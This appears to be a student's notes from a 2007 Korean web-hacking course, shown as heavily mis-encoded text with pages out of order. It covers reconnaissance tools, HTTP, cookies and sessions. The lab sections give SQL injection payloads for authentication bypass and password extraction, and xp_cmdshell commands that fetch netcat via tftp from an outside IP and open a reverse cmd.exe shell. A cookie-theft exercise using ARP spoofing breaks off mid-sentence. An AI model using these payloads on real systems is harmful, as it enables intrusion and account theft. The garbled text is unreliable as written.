์ •์˜๋„คํŠธ์›Œํฌ์ƒ์—์„œ ์ ‘๊ทบ ๊ฐ€๋Šฅํ•š ์†Œํ”„ํŠธ์›จ์–ด ๊ธฐ๋Šฅ๋‹จ์œ„๋กœ ํ”Œ๋žซํผ ํ”„๋กœ๊ทธ๋ž˜๋ฐ ์–ถ์–ด ๋ฐ ์ปดํฌ๋„ŒํŠธ ๋ชจ๋ธ์— ๋…

๋ฆฝ์ ์ธ ๊ธฐ์ˆ ๋กœ ๋งŒ๋“ค์–ด์ง‚ ์†Œํ”„ํŠธ์›จ์–ด

์›น ํ•ดํ‚น ๊ณต๊ฒฉ ์ ƒ์ฐจ

FootPrinting Scanning Enumeration

PllferingEscalatingPrivledge

GainingAccess

CreatingBack Doors

CoveringTracks

Web Hacking 2์ผ์ฐจ

2007๋…„ 10์›” 23์ผ ํ™”์š”์ผ

์˜ค์ ‚ 934

kisec ์›นํ•ดํ‚น ๋…ธํŠธํ•„๊ธฐ ํŽ˜์ด์ง€ 9

์›น ํ•ดํ‚น ๊ณต๊ฒฉ ์ ƒ์ฐจ

FootPrinting Scanning Enumeration

PllferingEscalatingPrivledge

GainingAccess

CreatingBack Doors

CoveringTracks

๊ณต๊ฒฉ์ ƒ์ฐจ

์ •๋ณด์ˆ˜์ง‘

Profiling

๋ถ„์„

Analysis

๊ณต๊ฒฉ

AttackEcploit

hellip

์‚ฌํšŒ๊ณตํ•™

๊ฒ€์ƒ‰์—”์ง‚

FootPrinting

PortScan

Web Site ๋ฏธ๋Ÿฌ๋ง

Web ๊ตฌ์กฐ๋ถ„์„

์˜๋ฏธ์žˆ๋Š” ์ •๋ณด๋กœ ๊ฐ€๊ณต

Account ์ˆ˜์ง‘

OS์ •๋ณด์ทจ์•ฝ์ 

ํฌํŠธ๋ณ„์„œ๋น„์Šค์ทจ์•ฝ์ 

์ ‚์ฒด๊ตฌ์กฐ์†Œ์Šค์ฃผ์„

์ฟ ํ‚ค๋“ฑ ๋ถ„์„

์ •๋ณด์— ๊ทบ๊ฑฐํ•š ๊ณต๊ฒฉ

BF Guessing

OSNetwork Service

Exploitation

๊ถŒํ•š์ƒ์Šน

OWASPWASC๋“ฑ์— ์˜ํ•š ๊ณต๊ฒฉ

๋ณด๊ณ ์„œ

1์ •๋ณด์ˆ˜์ง‘

์‚ฌํšŒ๊ณตํ•™

๋„๋ฉ”์ธ ์ •๋ณด IP Block ์ •๋ณด

Whois

Dig

Whosip

Netcraft

๊ธฐ๋ณธ์ •๋ณด

httpwebarchiveorg

Google Cache

Web Archive

httpjohnnyihackstuffcom

์‹ฌ์ •์žฌ(googledorkpdf)

Google Dork

Google hacking DB ์‚ฌ์šฉ

Google API Key(ํ‚ค ๋ฐœ๊ธ‰ ํ์ง€)

SiteDigger Wikto

๊ฒ€์ƒ‰์—”์ง‚(No-Tech Hacking)

๊ตฌ๊ธ€ ํ•ดํ‚น ํ‚ค์›Œ๋“œ ์ œ๊ณต ์‚ฌ์ดํŠธ

Footprinting Web Server

kisec ์›นํ•ดํ‚น ๋…ธํŠธํ•„๊ธฐ ํŽ˜์ด์ง€ 10

AFD(Acitive Filter Detection)

ICMP TTL๊ฐ’์„ ์กฐ์ ƒํ•ด๊ฐ€๋ฉฐ ์›น ์„œ๋ฒ„ ํƒ์ง€

netcraftcom

Stealth Scan-sS

Normal Scan-sT-sU

Network Services Version Scan-sV

OSDetection-O-A

DoNotPing_P0

Idle scan

IDS์šฐํšŒ

httpunicornscanorg

Unicorn scan -mT -p -v -r 2501921681024q

Unicornscan

Nc

jikto

Port Scan(Port Mapping)

httTrack

Web Site Mirroring

kisec ์›นํ•ดํ‚น ๋…ธํŠธํ•„๊ธฐ ํŽ˜์ด์ง€ 11

-grepegrep awksedsortuniq(moreheadless)๋“ฑ ํ™œ์šฉ

Mirroring ํ›„ ์ •์  ๋ถ„์„

balckwindow

InteliTamper

Wikto

Web๊ตฌ์กฐ ๋ถ„์„(๋ฐ˜์ž๋™)

Httpwatch

TamperlE

Cooxie

LiveHttpHeaders(firefox)

Command line tool(nccurlopenssl)

Manual Analysis

ParosWebscrabFidderBurpIntruder

SoftwareProxy

Web๊ตฌ์กฐ๋ถ„์„(์ˆ˜์ž‘์—…)

๊ด€๋ฆฌ์žํŽ˜์ด์ง€

์ž๋ฃŒ์‹ค(web shell)

ํ†ต๊ณ„ ์ƒํƒœ ํŽ˜์ด์ง€

ํšŒ์›๋“ฑ๋ก์šฐํŽธ๋ฒˆํ˜ธ ์กฐํšŒ(์ธ์ ์…˜๊ณต๊ฒฉ)

(์ธ์ ์…˜์€ ์ž…๋ ฅ๊ฐ’์„ ๋„ฃ์—ˆ์„๋•Œ ๊ฒฐ๊ณผ๋ฅผ ๋ฟŒ๋ ค์ฃผ๋Š” ํŽ˜์ด์ง€๋ฅผ ์ฐพ์•„์•ผํ•š๋‹ค)์•†๋ณด์—ฌ์ฃผ๋Š”๊ฑด ๋ธ”๋ผ์ธ๋“œ ์ธ์ ์…˜

์•”ํ˜ธ๋ถ„์‹ค(์•”ํ˜ธ ํš๋“ ์ˆ˜์›”)

์ •๋ณด์ˆ˜์ •(์ˆ˜ํ‰์ˆ˜์ง์ƒ์Šน๊ธฐํšŒ)

ํšŒ์›๊ฐ€์ž…ํŽ˜์ด์ง€

๊ฒฐ์ œ ํŽ˜์ด์ง€

Basic Banner Garbbing

Http resonse ํ—ค๋” ์ˆš์„œ

Http resonse ํ—ค๋” ์กด์žฌ ์œ ๋ฌด

Http resonse ํ—ค๋”์˜ ํŠน์ • ๊ฐ’

Tracehead ๋“ฑ์— ๋Œ€ํ•š ์ƒ์ดํ•š ์‘๋‹ต

๋ฐ์ดํ„ฐ์—†์ด ์ ‚์†กํ•š put์— ๋Œ€ํ•š์‘๋‹ต

kisec ์›นํ•ดํ‚น ๋…ธํŠธํ•„๊ธฐ ํŽ˜์ด์ง€ 12

Tracehead ๋“ฑ์— ๋Œ€ํ•š ์ƒ์ดํ•š ์‘๋‹ต

๋ฐ์ดํ„ฐ์—†์ด ์ ‚์†กํ•š put์— ๋Œ€ํ•š์‘๋‹ต

Unexpercted Method ์ ‚์†ก

๋™์ผ์š”์ฒญ ๋ฐ˜๋ณต ์ ‚์†ก

์ทจ์•ฝ์  ์Šค์บ”(system)

Xscan

Nessus

n-stealth security scanner

์ทจ์•ฝ์  ์Šค์บ”(Web Server amp WAS amp Web App)

APP SCANNER

ACUNETIX

NSTALKER SCANNER

์Šค์บ” ISSUE

BASIC DIGEST NTML CERT

FORM-BASED

์ธ์ฆ์ •๋ณด ์„ค์ •

์Šค์บ” ๊ฐ•๋„(๋ฉ€ํ‹ฐ ์ปค๋„ฅ์…˜ ํƒ€์ž„์•„์›ƒ ๊ณต๊ฒฉ๋ชจ๋“œ๋น„๊ณต๊ฒฉ๋ชจ๋“œ)

๋ถ„์„

์˜๋ฏธ์žˆ๋Š” ์ •๋ณด๋กœ ๊ฐ€๊ณต

ACCOUNT ์ˆ˜์ง‘

OS์ •๋ณด์— ๋”ฐ๋ฅธ ์ทจ์•ฝ์  ์ˆ˜์ง‘

ํฌํŠธ๋ณ„ ์„œ๋น„์Šค ์ทจ์•ฝ์ 

์›น์„œ๋ฒ„ ์ ‚์ฒด๊ตฌ์กฐ ๋ถ„์„

์ฃผ์„

ํžˆ๋“ž ํ•„๋“œ

์†Œ์Šค๋ถ„์„

์ฟ ํ‚ค๋ถ„์„

์„ธ์…˜ID์ƒ์„ฑ ์ทจ์•ฝ์  ๋ถ„์„

๊ณต๊ฒฉ

์ •๋ณด์— ๊ทบ๊ฑฐํ•š ๊ณต๊ฒฉ

๋ฌด์ž‘์œ„ ๊ณต๊ฒฉ

์‚ฌ์ ‚๊ณต๊ฒฉ

๊ณต๊ฒฉ์ดˆ์ 

์ˆ˜์ง‘๋œ ACCOUNT ์ •๋ณด๋ฅผ์ด์šฉ

OSNETWORK SERVICE ๊ณต๊ฒฉ

WEBSERVER WEBAPP SERVER WEBAPPLICATION

SQLISCANNER

๊ถŒํ•š ์ƒ์Šน

์ˆ˜ํ‰

ํšŒ์›์ •๋ณด ์ˆ˜์ •

Cookie Stealing

CSRF

์ˆ˜์ง

CSRF

CSRF๋ฅผ ํ†ตํ•ด DMZ์˜์—ญ์— ์ ‘์†ํ•š ๊ด€๋ฆฌ์ž์—๊ฒŒ ๋‚ด๋ถ€ ZONE์ชฝ์œผ๋กœ ๊ฐ•์ œ REQEUST๋ฅผ ํ•˜๋„๋ก ์กฐ์ž‘ ๊ฐ€๋Šฅ

kisec ์›นํ•ดํ‚น ๋…ธํŠธํ•„๊ธฐ ํŽ˜์ด์ง€ 13

์ ‚์ œ์กฐ๊ฑด์€ ๋‚ด๋ถ€๋ง์˜ IP APPLICATION PARAMETERS ๋ฅผ ๋ชจ๋‘ ์•Œ๊ณ  ์žˆ์„ ๊ฒฝ์šฐ

CSRF๋ฅผ ํ†ตํ•ด DMZ์˜์—ญ์— ์ ‘์†ํ•š ๊ด€๋ฆฌ์ž์—๊ฒŒ ๋‚ด๋ถ€ ZONE์ชฝ์œผ๋กœ ๊ฐ•์ œ REQEUST๋ฅผ ํ•˜๋„๋ก ์กฐ์ž‘ ๊ฐ€๋Šฅ

OWASPWASC

์ˆ˜์ž‘์—…

์›น ์–ดํ”Œ๋ฆฌ์ผ€์ด์…˜ ์ทจ์•ฝ์  ๊ณต๊ฒฉ

์œ„ํ—˜๋„์— ๋”ฐ๋ผ ๊ณต๊ฒฉ

๊ฐ€์šฉ์„ฑ์„ ๋–จ์–ดํŠธ๋ฆฌ๋Š” ๊ณต๊ฒฉ์ œ์™ธ

์„œ๋ฒ„์˜ shellํš๋“ or๊ด€๋ฆฌ์ž ์•”ํ˜ธ ํš๋“

๋ฐ์ดํ„ฐ ์—ด๋žŒ ํ—ˆ์šฉ๊ธˆ์ง€

Ethical Hacking์ธ ๊ฒฝ์šฐ ๊ณ ๊ฐ์˜ ์š”๊ตฌ์‚ฌํ•ญ ๋ฐ˜์˜

์˜คํƒ์ œ๊ฑฐ

์›น ์ทจ์•ฝ์  ์Šค์บ๋„ˆ ๊ฒฐ๊ณผ ๋ถ„์„

ONE WAY WEB HACKING ์ฝ์–ด๋ณด๊ธฐ

kisec ์›นํ•ดํ‚น ๋…ธํŠธํ•„๊ธฐ ํŽ˜์ด์ง€ 14

SQL INJECTION

GETPOST ํŒŒ๋ผ๋ฏธํ„ฐ HTTP REQUEST ํŒŒ๋ผ๋ฏธํ„ฐ ์ฟ ํ‚ค ๊ฐ’

๊ธฐํƒ€ ์„œ๋ฒ„์—์„œ ์ฒ˜๋ฆฌํ•˜๋Š” ๋ชจ๋“ž ํด๋ผ์ด์–ถํŠธ ๊ฐ’

ํด๋ผ์ด์–ถํŠธ ์ž…๋ ฅ ๊ฐ’ ์œ ํ˜•

ํด๋ผ์ด์–ถํŠธ์—์„œ ์ž…๋ ฅ๋œ ๊ฐ’์ด ์œ ํšจ์„ฑ ๊ฒ€์ฆ๊ณผ์ • ์—†์ด sql ๋ฌธ์— ํฌํ•จ๋˜๋Š” ๊ฒฝ์šฐ

MAIN CAUSE

Impact

์ธ์ฆ์šฐํšŒ

๋ฐ์ดํ„ฐ๋ฒ ์ด์Šค ๋คํ”„ ์กฐ์ž‘ ์ƒ์„ฑ ํŒŒ๊ดด

DML D์ด ๋“ฑ ์ƒ์ƒํ•› ์ˆ˜ ์žˆ๋Š” ๋ชจ๋“ž ์ž‘์—…

๋ฐ์ดํ„ฐ๋ฒ ์ด์Šค ์ปจํŠธ๋กค

์‹œ์Šคํ…œ ๋ช…๋ น์–ด ์‹คํ–‰

COUNTERMEASURE

์ž…๋ ฅ๊ฐ’ ๊ฒ€์ฆ

์ตœ์†Œ๊ถŒํ•š ๋ถ€์—ฌ(SYSTEMDBMSDatabase)

์ธ์ฆ์šฐํšŒ

์ธ๊ฐ€๋œ ์‚ฌ์šฉ์ž์˜ ID PW ๋ฅผ ์ž…๋ ฅํ•˜์ง€ ์•Š๊ณ ๋„ ์ธ์ฆ์„ ์šฐํšŒํ•˜๋Š” ํ–‰์œ„

ID PW๋ฅผ ๋ชจ๋ฅด๋Š” ์ƒํƒœ์—์„œ๋„ ์ ์ ƒํžˆ ๊ตฌ์„ฑ๋œ ๋ฌธ์ž์—ด์„ ์ž…๋ ฅํ•˜์—ฌ ์ธ์ฆ์„ ์šฐํšŒํ•˜๋Š” ๊ฒƒ์ด ๊ฐ€๋Šฅ

์ž…๋ ฅ๋œ ๋ฌธ์ž์—ด์€ SQL ๋ฌธ์˜ ์ผ๋ถ€๋กœ ์‚ฝ์ž…์ด ๋˜์–ด ์‹คํ–‰๋จ

์ธ์ฆ ์šฐํšŒ์— ์‚ฌ์šฉ๋˜๋Š” ์ž…๋ ฅ๊ฐ’์€

๋ฌธ๋ฒ•์ƒ ์˜ค๋ฅ˜๋ฅผ ์‹œํ‚ค์ง€ ์•Š์•„์•ผ ํ•จ

WHERE์ ƒ์˜ ์กฐ๊ฑด์ด ํ•ญ์ƒ ์ฐธ์ด ๋˜๋„๋ก ์กฐ์ž‘

์›น ์• ํ”Œ๋ฆฌ์ผ€์ด์…˜์˜ ์ผ๋ฐ˜์ ์ธ ์ธ์ฆ ์ ƒ์ฐจ

1IDPW ์ž…๋ ฅ

2SQL Query ์ƒ์„ฑ

3DATABASE์— ์ฟผ๋ฆฌ ์ ‚์†ก

4DATABASE์—์„œ ์ฟผ๋ฆฌ๋ฌธ ์‹คํ–‰

5๋ฐ˜ํ™˜๋˜๋Š” RETURN๊ฐ’์— ๋”ฐ๋ผ ์ธ์ฆ์—ฌ๋ถ€ํŒ๋‹จ

SQL INJECTION ์ ƒ์ฐจ

DB ์Šคํ‚ค๋งˆํŒŒ์•… (DBTABLECOLUMN ํ™˜๊ฒฝ์ •๋ณด๋“ฑ ํŒŒ์•…

๋ฐ์ดํ„ฐ๋ฒ ์ด์Šค ์ด๋ฆ„ ํŒŒ์•…

ํ…Œ์ด๋ธ”์ด๋ฆ„ ํŒŒ์•…

์ปฌ๋Ÿผ์ด๋ฆ„ ํŒŒ์•…

๋ชจ๋“ž SQL INJECTION์€ ์ž…๋ ฅ๊ฐ’์— ๋Œ€ํ•š ์œ ํšจ์„ฑ ๊ฒ€์ฆ์„ ํ•˜์ง€ ์•Š๊ธฐ ๋•Œ๋ฌธ์— ๋ฐœ์ƒํ•š๋‹ค ์—๋Ÿฌ๋ฅผ ์œ ๋„ํ•˜์—ฌ ํ•„๋“œ์˜ ์ •๋ณด๋ฅผ ๋ˆ„์ถœ์‹œํ‚จ๋‹ค

DBMS ๊ฐ€ ์ ์ ƒํ•š ๊ถŒํ•š์„ ๊ฐ€์ง€๊ณ  ์žˆ๋Š” ๊ฒฝ์šฐ ๋ ˆ์ง€์ŠคํŠธ๋ฆฌ์— ์ ‘๊ทบํ•˜๋Š” ๊ฒƒ์ด ๊ฐ€๋Šฅ

DBMS๊ฐ€ ์ ์ ƒํ•š ๊ถŒํ•š์„ ๊ฐ€์ง€๊ณ  ์žˆ๋Š” ๊ฒฝ์šฐ ์ฟผ๋ฆฌ๋ฅผ ํ†ตํ•š ์„œ๋น„์Šค ์ œ์–ด๊ฐ€ ๊ฐ€๋Šฅ

OYES MALL (SQL INJECTION์„ ์ด์šฉํ•š ๊ด€๋ฆฌ์ž ๊ถŒํ•š ํš๋“ ์‹ค์Šต

ํ™˜๊ฒฝ์€(2000ASPMS-SQL2000)

์ค€๋น„๋œ ์‡ผํ•‘๋ชฐ์ด๋‹ค

์ฒซ๋ฒˆ์งธ ๋ฐฉ๋ฒ•

Web Hacking 3์ผ์ฐจ

2007๋…„ 10์›” 25์ผ ๋ชฉ์š”์ผ

์˜ค์ ‚ 1200

kisec ์›นํ•ดํ‚น ๋…ธํŠธํ•„๊ธฐ ํŽ˜์ด์ง€ 15

group by(user_id) -- ๋ฅผ ์ด์šฉํ•ด ํ…Œ์ด๋ธ”์„ ์•Œ์•„๋‚ธ๋‹ค

Member ํ…Œ์ด๋ธ”์•†์—์žˆ๋Š” num์ด๋ผ๋Š” ์ปฌ๋Ÿผ์„ ํ† ํ•ด๋ƒˆ๋‹ค

kisec ์›นํ•ดํ‚น ๋…ธํŠธํ•„๊ธฐ ํŽ˜์ด์ง€ 16

union select from members where user_id like o ํ•ด๋ด๋ผ ๋กœ๊ทธ์ธ ๋ ๊ฑฐ๋‹ค

๋‘๋ฒˆ์งธ ๋ฐฉ๋ฒ•

์ฃผ์†Œ๋ก์กฐํšŒ ๋ถ€๋ถ„์— SQL INJECTION์„ ํ•˜์˜€๋‹ค

$UNION SELECT 1234TABLE_NAME FROM INFORMATION_SCHEMATABLES-- ์™€๊ฐ™์ด ์งˆ์˜๋ฅผ ํ•˜๋ฉด ํ† ํ•ด๋‚ธ๋‹ค

kisec ์›นํ•ดํ‚น ๋…ธํŠธํ•„๊ธฐ ํŽ˜์ด์ง€ 17

์šฐ๋ฆฌ๋Š” members ๋ผ๋Š” ํ…Œ์ด๋ธ”์ด ์กด์žฌํ•˜๋Š” ๊ฒƒ์„ ๋ณผ์ˆ˜ ์žˆ์„ ๊ฒƒ์ด๋‹ค

$UNION SELECT 1234 COLUMN_NAME FROM INFORMATION_SCHEMACOLUMNS WHERE TABLE_NAME= members --

Members์— ๋Œ€ํ•š ์ปฌ๋Ÿผ์„ ํ† ํ•ด๋‚ธ๋‹ค

$ or 1=(select top 1 user_id from members)--

User id์˜ ์ปฌ๋Ÿผ์— top 1 ์ธ๊ฒƒ์„ ํ† ํ•ด๋‚ธ๋‹ค

union select 1234 user_idpasswd from members where user_id=oyes --

kisec ์›นํ•ดํ‚น ๋…ธํŠธํ•„๊ธฐ ํŽ˜์ด์ง€ 18

์œผ์•„~password ๊ฐ€ oyesmall ์ด๋ผ๋„ค ์‹ค์Šต ๋

File Uploading

$$ exec masterxp_cmdshell tftp -i 2112406869 get ncexe nc2000exe --

$$ exec masterxp_cmdshell nc1000exe 2112406877 7777 -e cmdexe --

์•„์ฃผ ๊ฐ„๋‹จํ•˜๋‹ค

$$ exec masterxp_cmdshell tftp -i 2112406869 get ncexe nc6249exe ampamp nc -e cmdexe 2112406877 6249 --

kisec ์›นํ•ดํ‚น ๋…ธํŠธํ•„๊ธฐ ํŽ˜์ด์ง€ 19

OPTIONS ์‘๋‹ต ๊ฐ€๋Šฅํ•š HTTP๋ฉ”์†Œ๋“œ๋ฅผ ์š”์ฒญ

CONNECT ํ„ฐ๋„๋ง์˜ ๋ชฉ์ ์œผ๋กœ ์—ฐ๊ฒฐ์š”์ฒญ(Proxy ์—ฐ๊ฒฐ)

GETPOST ๋ฉ”์†Œ๋“œ

GET๊ณผ POST๋Š” ์„œ๋ฒ„์— ์ž์›์„ ์š”์ฒญํ•›๋•Œ ์‚ฌ์šฉ๋จ

GET๋ฐฉ์‹ POST๋ฐฉ์‹

์„œ๋ฒ„์— ์ ‚๋‹ฌํ•˜๊ณ ์žํ•˜๋Š” ๋ฐ์ดํ„ฐ๋ฅผ URL ์— ํฌํ•จ์‹œํ‚ด

์ ‚์†กํ•› ์ˆ˜ ์žˆ๋Š” ๋ฐ์ดํ„ฐ๋Ÿ‰์ด ์ œํ•š๋จ(2K4K)

์„œ๋ฒ„์— ์ ‚๋‹ฌํ•› ๋ฐ์ดํ„ฐ๋ฅผ REQUEST Body์— ํฌํ•จ์‹œํ‚ด

๋ฐ์ดํ„ฐ ์ ‚์†ก๋Ÿ‰์˜ ์ œํ•š์ด ์—†์Œ(์‹œ๊ฐ„์ œํ•š๊ฐœ๋…)

GET loginaspuser_id=adminampuser_pass=1234

HOSTwwwsitecom

POST loginasp HTTP11

HOSTwwwsiteorg

User_id=admin user_pass=1234

get๋ฐฉ์‹(์›น ๋กœ๊ทธ๋Š” 8000์ž ๊นŒ์ง€๋งŒ ์ €์žฅํ•š๋‹ค)

HEAD ๋ฉ”์†Œ๋“œ

TRACE ๋ฉ”์†Œ๋“œ

WEBDAV ๊ด€๋ ฆ๋ฉ”์†Œ๋“œ

PUT

COPY

MOVE

DELETE

MAKECOL

PUT๋ฉ”์†Œ๋“œ ์‚ฌ์šฉ์˜ˆ์ œ

PUT HTTPWWWKISECCOMindex11html HTTP1O

HOSTWWWKISECCOM

Content-Length30

User-AgentBlaBla Client

kisec ์›นํ•ดํ‚น ๋…ธํŠธํ•„๊ธฐ ํŽ˜์ด์ง€ 4

User-AgentBlaBla Client

HTTP RESPONSE์˜ ์ฃผ์š” ์‘๋‹ต ์ฝ”๋“œ

์ฃผ์š” ์‘๋‹ต์ฝ”๋“œ

200 OK 400 BadRequest

201 Created 401 Unauthorized

202 Accepted 403 Forbidden

404 Not Found 301 Moved permanently

302 Found 500 Internal Server Error

HTTP ๊ด€๋ ฆ ๊ธฐ์ˆ 

์ฟ ํ‚ค

94๋…„ ๋„ท์Šค์ผ€์ดํ”„์—์„œ ๊ฐœ๋ฐœ

์„œ๋ฒ„๊ฐ€ ์ƒ์„ฑํ•˜๊ณ  ํด๋ผ์ด์–ถํŠธ์— ์ €์žฅ์‹œํ‚ค๋Š” ๋ฐฉ์‹

์ €์žฅ์˜๊ตฌ์ (Persistent๋””์Šคํฌ)๋ฐ˜์˜๊ตฌ์ (Non-Persistent ๋ฉ”๋ชจ๋ฆฌ)

๋ณด์•†๋ณด์•†๋น„๋ณด์•†

์ œํ•šํฌ๊ธฐ์ œํ•š(4k)๋ณ€์ˆ˜์ œํ•š(2k)

ํ•š๋ฒˆ ์ €์žฅ๋œ ์ฟ ํ‚ค๋Š” ์ฟ ํ‚ค์˜ ์œ ํšจ๊ธฐ๊ฐ„์ด ์ง€๋‚˜์ง€ ์•Š๋Š” ํ•š ํ•ด๋‹น ๋„๋ฉ”์ธ์— ์ ‘์†์‹œ ๋ธŒ๋ผ์šฐ์ €๊ฐ€ ์ž๋™์œผ๋กœ ํƒ‘์žฌํ•˜์—ฌ ์ ‚์†ก

ํ•˜๊ฒŒ ๋จ

์ฟ ํ‚คํŒŒ์ผํ˜•ํƒœ์‚ฌ์šฉ์ž์ด๋ฆ„์ ‘์†ํ•š์‚ฌ์ดํŠธ

์ฟ ํ‚คํŒŒ์ผ๋‚ด์šฉ๊ฐœ๋ฐœ์ž๊ฐ€ ์„ค์ •ํ•˜๊ธฐ ๋‚˜๋ฆ„

๋””ํดํŠธ ๋””๋ ‰ํ† ๋ฆฌ CDocuments and Setting์‚ฌ์šฉ์ž์ด๋ฆ„Cookies

๊ธฐ๋ณธํฌ๋งท

Set-cookie

Name=value ์ฟ ํ‚ค์˜ ์ด๋ฆ„

Expire=date ์ฟ ํ‚ค์˜ ์œ ํšจ๊ธฐ๊ฐ„

Domain=domain ๋„๋ฉ”์ธ

Path=path ์ฟ ํ‚ค๋ฅผ ์ด์šฉํ•˜์—ฌ ์ ‘์†์‚ฌ๋Šฅํ•š URL

Secure ๋ณด์•†๋น„๋ณด์•†์„ค์ •

๊ด€๋ ฆ ISSUE

์‚ฌ์šฉ์ž ์ž„์˜์กฐ์ž‘ ๋ฐ ์Šค๋‹ˆํ•‘ ํ”„๋ก์‹œ ๋“ฑ์„ ํ†ตํ•š ๋ณ€์กฐ๊ฐ€๋Šฅ

XSS๋“ฑ์„ ํ†ตํ•š ํƒ€์ธ์˜ ์ฟ ํ‚คํƒˆ์ทจ

์žฌ์ƒ๊ณต๊ฒฉ์— ๋ฌด๋ฐฉ๋น„

๋Œ€์‘๋ฐฉ์•† ์ฟ ํ‚ค๋Š” ์‚ฌ์šฉํ•˜์ง€ ์•Š๋Š”๋‹ค๋Š” ๊ธฐ๋ณธ ์ฒ ์น™ ์‚ฌ์šฉํ•› ๊ฒฝ์šฐ ๊ฒ€์ฆ๋œ ์•”ํ˜ธํ™” ์•Œ๊ณ ๋ฆฌ์ฆ˜์œผ๋กœ ์ตœ์†Œํ•š์˜ ์ •๋ณด๋งŒ

์ €์žฅ ์ฟ ํ‚ค์˜ ๋ฌด๊ฒฝ์„ค ๊ฒ€์‚ฌ๋ฅผ ์œ„ํ•ด ์ ‚์†ก๋˜๋Š”(ํŠน์ • ๋ณ€์ˆ˜ ๊ฐ’+TimeStamp)๋“ฑ์˜ ์ •๋ณด๋ฅผ ํ•ด์‹œํ•š ๊ฐ’๊นŒ์ง€ ๊ฐ™์ด

์ ‚์†ก ์™„๋ฒฝํ•˜์ง‚ ์•Š์œผ๋‚˜ ์„ธ์…˜๊ณผ ๊ฐ™์ด ๋ณ‘ํ–‰์‹œ ๋ณด์•†์„ฑ ํ–ฅ์ƒ

์„ธ์…˜(SESSION)

HTTP์ ‘์† ์„ธ์…˜์— ๋Œ€ํ•š ์ฒ˜๋ฆฌ๋ฅผ ๋‹ด๋‹นํ•˜๋Š” ๊ธฐ์ˆ 

Server Side ๊ธฐ์ˆ ๋กœ HTTP์˜ Stateless ํ•š ํŠน์„ฑ์„ ๋ณด์™„ํ•˜๊ธฐ ์œ„ํ•ด Uniq ํ•š ID๋ฅผ ์ƒ์„ฑํ•˜์—ฌ ํ˜„์žฌ ์ ‘์†ํ•š ํด๋ผ์ด์–ถํŠธ์—๊ฒŒ

ํ•›๋‹นํ•ด์ฃผ๊ณ  ๊ธฐ์–ตํ•˜๋Š” ๋ฐฉ์‹

๊ณผ๊ฑฐ cookie์— ์ €์žฅํ•˜๋˜ ๋ณ€์ˆ˜ ๊ฐ’ ์„ ์ดˆ๊ธฐ ์ ‘์† ์‹œ ํ•›๋‹นํ•˜๊ฒŒ ๋จ

ํ•›๋‹นํ•š ๋ณ€์ˆ˜๋Š” ์„œ๋ฒ„์— ์ €์žฅ๋˜๋ฉฐ ํด๋ผ์ด์–ถํŠธ ์ธก ์—๋Š” ์„ธ์…˜ ID๋งŒ ๋ถ€์—ฌ๋จ

์ฃผ๋กœ Web Application Server ๋‚˜ Web Server ๋ฅผ ํ•›๋‹น ๋ฐ›์œผ๋ฉฐ ์ด๋•Œ ํ•ด๋‹น ID์— ํŠน์ • ์ •๋ณด๋ฅผ ์ €์žฅํ•› ์ˆ˜ ์žˆ์Œ

ํด๋ผ์ด์–ถํŠธ๋Š” ์„œ๋ฒ„์™€ ํ†ต์‹ž์‹œ SESSION ID๋งŒ ์ฃผ๊ณ  ๋ฐ›์Œ

์„ธ์…˜ID

WASWS ์„ธ์…˜ ID๋ณ€์ˆ˜

kisec ์›นํ•ดํ‚น ๋…ธํŠธํ•„๊ธฐ ํŽ˜์ด์ง€ 5

IIS ASPSESSIONID

APACHE SESSIONID

TOMCAT JSESSIONID

PHP PHPSESSID

๊ธฐํƒ€ JServerSessionID

JWSESSIONID

SESSID

SESSION

SID

SESSION_ID

์„ธ์…˜

WASWS ๋งˆ๋‹ค ๋‹ค๋ฅด์ง€๋งŒ ๋ณดํ†ต 10๋ถ„20๋ถ„ ์„ค์ •์ž„

์‚ฌ์šฉ์ž๊ฐ€ ๋น„์ •์ƒ ๋กœ๊ทธ์•„์›ƒ ํ•˜๊ฑฐ๋‚˜ Request ์š”์ฒญ ์—†์„ ์‹œ ์œ„ ํƒ€์ž„ ์•„์›ƒ ๊ฐ’ ์ดˆ๊ณผ ํ›„ ํ•ด๋‹น ์„ธ์…˜ID๋Š” ์†Œ๋ฉธ

์„ธ์…˜๋„ ์ฟ ํ‚ค์™€ ๊ฐ™์€ ์œ ํšจ๊ธฐ๊ฐ„ ์žˆ์Œ

๊ด€๋ ฆ ISSUE

์ดˆ๊ธฐ์„ธ์…˜๊ฐ์ฒด ์ƒ์„ฑ์‹œ ํด๋ผ์ด์–ถํŠธ์˜ IP ๋ฉ”์ธ๋ณด๋“œSN ํ•˜๋“œ๋””์Šคํฌ SN๋“ฑ Uniq ํ•š ๊ฐ’์„ ์„ค์ •ํ•š ํ›„ ๋งค ํŽ˜์ด์ง€๋งˆ๋‹ค

์ธ์ฆ๋น„๊ต๋ฅผ ํ†ตํ•ด ๊ณต๊ฒฉ์„ ์˜ˆ๋ฐฉํ•› ์ˆ˜ ์žˆ์Œ

์‚ฌ์šฉ์ž ์ž„์˜์กฐ์ž‘์„ ํ†ตํ•š ๊ณต๊ฒฉ์‹œ๋„

์„ธ์…˜ ์ดˆ๊ธฐ ์ƒ์„ฑ์‹œ๋งˆ๋‹ค ์ƒˆ๋กœ์šด ID๋ฅผ ์ƒ์„ฑ

์žฌ์ƒ๊ณต๊ฒฉ

์‹ค์Šต

Cookie๊ฐ’์„ ์Šค๋‹ˆํ•‘ ํ•ด์„œ ์ƒ๋Œ€๋ฐฉ Cookie๊ฐ’์œผ๋กœ ์ƒ๋Œ€๋ฐฉ ๊ณ„์ •์œผ๋กœ ๋กœ๊ทธ์ธ

์‹ค์Šตํ™˜๊ฒฝWinArpSpoof or CainampAbel or wireshark

Wireshark๋กœ arp ์Šคํ‘ธํ•‘์„ ํ•ด์„œ ํŒจํ‚ท์ด ๋‚˜์—๊ฒŒ ๋„˜๊ฒจ์˜ค๊ฒŒ ๋งŒ๋“ž๋‹ค

kisec ์›นํ•ดํ‚น ๋…ธํŠธํ•„๊ธฐ ํŽ˜์ด์ง€ 6

ํ™”๋ฉด๊ณผ ๊ฐ™์ด wireshark๋ฅผ ์ค€๋น„ํ•š๋‹ค

์Šคํ‘ธํ•‘์„ ํ•˜๊ณ  ์žˆ์œผ๋ฉด ์ƒ๋Œ€๋ฐฉ ์ธก์—์„œ wwwnavercom ์— ๋กœ๊ทธ์ธ์„ ํ•˜๊ฒŒ ๋˜๋ฉด ํŒจํ‚ท์ด ๋‚ ๋ผ ์˜ค๊ฒŒ ๋œ๋‹ค ์—ฌ๊ธฐ์„œ ์šฐ๋ฆฌ๋Š”

